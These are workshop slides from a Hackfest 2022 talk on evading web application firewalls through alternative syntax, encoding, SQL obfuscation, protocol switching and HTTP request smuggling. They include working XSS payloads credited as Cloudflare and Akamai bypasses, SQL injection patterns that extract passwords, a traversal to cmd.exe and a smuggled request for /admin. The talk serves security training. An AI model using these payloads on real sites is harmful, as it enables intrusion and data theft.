Web Application Firewall Workshop

Presented by Philippe Arteau

Hackfest 2022

About Me

  • Security Engineer at ServiceNow
  • Interested in application security, automation, crypto, ...
  • Open-source developer
    • Find Security Bugs: Static Analysis for Java applications
    • Burp and ZAP Plugins: (Retire.js, CSP Auditor, Reissue Request Scripter, …)

Agenda

  1. What is a WAF?
  2. Alternative Syntax
  3. Encoding
  4. SQL Syntax
  5. Switching Protocol
  6. Request Smuggling

Workshop

What is a WAF?

Definition

  • The purpose of the Web Application Firewall is to filters, monitors, and blocks HTTP traffic.

  • HTTP traffic can be incoming and/or outgoing

Vendors

center

Alternative Syntax

Alternative Paths

What is the path to Wordpress's users endpoint?

Source: 6 ways to enumerate WordPress Users

Alternative HTML Tags

<svg/onload=prompt(/XSS/)>

<video onnull=null onmouseover=confirm(1)>

Source: Cloudflare WAF Bypass by Bohdan Korzhynskyi

<dETAILS open onToGgle=a=prompt,a() x>

Source: Akamai WAF Bypass found by @s0md3v

Alternative Keywords

Instead of information_schema.tables, all_tables, sys.sysobjects ...

Alternatives table names:

  • information_schema.table_constraints
  • mysql.innodb_table_stats
  • dbo.__MigrationHistory
  • ALL_TAB_STATISTICS

Encoding

Case Mapping

PHP i identifier is needed to enable insensitivity

preg_match("/union.*select/i")

Python re.IGNORECASE

re.compile("<[a-z]", re.IGNORECASE)

[NC] in .htaccess (Apache HTTP Server)

RewriteCond %{QUERY_STRING} \bwp/v2/users\b [NC]

URL Encoding

Path encoded

http://server.com/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

HTML double encoded

%253Cscript%253Econfirm()%253C%252Fscript%253E

HTML/XSS and Encoding

Depending on the context, different encoding can be used.

Encoding Type <
Named XML/HTML entities &lt;
Hex XML/HTML entities &x3C; / &#60;
Slash escaped \x3C , \074, \74
String.fromCharCode String.fromCharCode(74)

Unicode Encoding

Unicode is not the only way to encode characters

• UTF-7 (+ADw-script+AD4-alert(123)+ADw-+AC8-script+AD4-) ⚠️
• UTF-16LE (00 3c 00 62 00 6f 00 6f 00 6b)
• UTF-16BE
• UTF-32…

⚠️: No longer supported by many browsers and frameworks.

More info: Unicode vulnerabilities that could byͥte you

Unicode Normalization

Character Code point
(U+FF1C)
< (U+003C)

SQL query:

INSERT INTO ContentTable VALUES (…,'<img src=…')

Content when fetch:

<img src=x onerror=prompt(1)>

Exercises

Time for some action..

Open the following URL and see if you can find the bypasses:
Live instance (only for Hackfest)

SQL Injection

SQLi Whitespace alternatives

DBMS ASCII Characters (in hex)
MySQL 5 09, 0A, 0B, 0C, 0D, A0, 20
SQLite 0A, 0D, 0C, 09, 20
MSSQL 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, [...]
PostgreSQL 0A, 0D, 0C, 09, 20
Oracle 11g 00, 0A, 0D, 0C, 09, 20

SQLi Obfuscation Patterns

/*Comments*/

SELECT/**/name/**/FROM/**/users/**/WHERE/**/1=1

MSSQL [Square brackets]

SELECT"name"FROM[sys.databases]WHERE"id"=1

Oracle

SELECT 0x7461626c655f6e616d65 FROM all_tab_tables

Scientific Expression in MySQL

Using notation such as 1.e followed by non-numeric character...

1.e(ascii 1.e(substring(1.e(select password from users [...]

This is how MySQL/MariaDB will interpret

(ascii (substring((select password from users [...]

Source: A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection by Marc-Olivier Bergeron

Exercise

Time to bypass one of the most robust WAF modsecurity!

Live instance (only for Hackfest)

Switching Protocol

WebSocket

WebSocket handshake

websocket sequence diagram

WebSocket Passthrough

In order to work:

  • You need to either:
    • Control the status code of ONE page
    • Deploy a custom application at a given path
  • Proxy must honors 101 response (Switching Protocols)
  • WAF does not inspect WebSocket communication

HTTP/2 Cleartext

WebSocket handshake

h2c sequence diagram

HTTP/2 Cleartext Passthrough

In order to work:

  • The backend application needs to support H2C
  • Proxy must honors 101 response
  • WAF does not look at HTTP/2 Cleartext requests.

Exercise

New exercises for the fourth block!

Live instance (only for Hackfest)

Request Smuggling

HTTP/1.1 CL.CL

The proxy sees first Content-Length header.

HTTP/1.1 CL.CL

While the backend sees last Content-Length header.

HTTP/1.1 CL.TE

Transfer-Encoding: chunk

POST /index.php HTTP/1.1
Host: myapp.com
Transfer-Encoding: chunked

5\r\n
Hello\r\n
8\r\n
Hackfest\r\n
B\r\n
Conference!\r\n
0\r\n
\r\n

HTTP/1.1 CL.TE

POST / HTTP/1.1
Host: localhost
Content-Length: 45
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost

Conclusion

Conclusion

  • Think about transformation
    • Encoding, Replacement, Nested Encoding
  • Parsers implementation differences
    • Application vs Proxy vs Security controls
  • WAF is not a silver bullet
    • Using a WAF is not bad either! (Additional safety)

There is more...

The End !

Social

Slides